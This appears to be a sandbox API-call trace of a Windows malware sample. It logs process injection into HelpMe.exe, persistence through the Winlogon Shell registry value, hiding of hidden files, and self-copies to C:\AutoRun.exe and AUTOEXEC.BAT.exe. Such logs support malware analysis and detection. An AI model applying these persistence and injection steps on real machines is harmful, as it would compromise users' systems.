"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00280000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00280000","dwSize->257","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000090","hKey->0x000000ac","lpSubKey->Software\Microsoft\Windows\CurrentVersion\ThemeManager"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000090","lpValueName->Compositing"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000090","hKey->0x000000ac","lpSubKey->Control Panel\Desktop"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000090","lpValueName->LameButtonText"
"20190731003623.246","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x5ad70000","lpFileName->uxtheme.dll"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","CreateRemoteThread","SUCCESS","0x000000ac","lpStartAddress->0x00404008","th32ProcessID->612","szExeFile->HelpMe.exe"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","CreateRemoteThread","SUCCESS","0x000000b0","lpStartAddress->0x00404008","th32ProcessID->612","szExeFile->HelpMe.exe"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000bc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExA","SUCCESS","","hKey->0x000000bc","lpValueName->Shell","dwType->1","lpData->Explorer.exe  HelpMe.exe","cbData->25"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExA","SUCCESS","","hKey->0x000000c0","lpValueName->CheckedValue","dwType->4","lpData->0","cbData->4"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000c8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->Startup"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000000c8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000000c8","lpValueName->Startup","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup","cbData->130"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000cc","lpValueName->NoNetHood"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000cc","lpValueName->NoPropertiesMyComputer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoInternetIcon"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoCommonGroups"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoControlPanel"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->NoSetFolders"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","SUCCESS","0x000000ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32"
"20190731003628.223","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000ba","lpValueName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SystemSetupInProgress"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\CurrentControlSet\Control\MiniNT"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\WPA\PnP"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->seed"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->OsLoaderPath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->OsLoaderPath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SystemPartition"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SystemPartition"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->SourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackSourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackSourcePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->ServicePackCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->DriverCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->DriverCachePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000d0","lpValueName->DevicePath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","CreateMutexW","SUCCESS","0x000000cc","lpName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","CreateMutexW","SUCCESS","0x000000d8","lpName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","CreateMutexW","SUCCESS","0x000000e0","lpName->(null)"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e4","lpValueName->LogLevel"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e4","lpValueName->LogLevel"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->LogPath"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000e4","lpSubKey->AppLogLevels"
"20190731003628.233","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x77920000","lpFileName->SETUPAPI.dll"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc\PagedBuffers"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExA","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144\RpcThreadPoolThrottle"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows NT\Rpc"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryW","SUCCESS","0x77e70000","lpFileName->rpcrt4.dll"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000010c","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000108","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->55746"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->65536"
"20190731003628.243","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CopyFileExW","SUCCESS","","lpExistingFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpNewFileName->C:\AutoRun.exe"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\AUTOEXEC.BAT.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x004d0008","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120f37c","nOutBufferSize->0x00000208","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","FAILURE","","hDevice->0x00000120","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bc58","nInBufferSize->0x00000046","lpOutBuffer->0x00498c60","nOutBufferSize->0x00000020","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
